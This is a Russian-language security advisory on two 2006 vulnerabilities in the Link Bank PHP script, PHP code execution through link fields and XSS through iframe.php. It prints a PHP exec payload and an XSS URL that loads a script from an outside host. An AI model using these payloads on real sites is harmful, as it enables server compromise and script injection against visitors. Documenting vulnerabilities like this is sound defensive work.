Межсайтовый скриптинг и PHP-инклюдинг в Link Bank

Дата публикации:
17.03.2006
Дата изменения:
17.10.2006
Всего просмотров:
1751
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-1199
CVE-2006-1200
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Link Bank
Уязвимые версии: Link Bank, возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "url_name" и "url" во время добавления ссылки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример:

<?php exec($cmd) ?>

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "site" сценария "iframe.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://example.com/iframe.php?site=%3C/title%3E%3C/head
%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

URL производителя: daverave.64digits.com/index.php?page=linkbank

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: link bank code execution and xss

или введите имя

CAPTCHA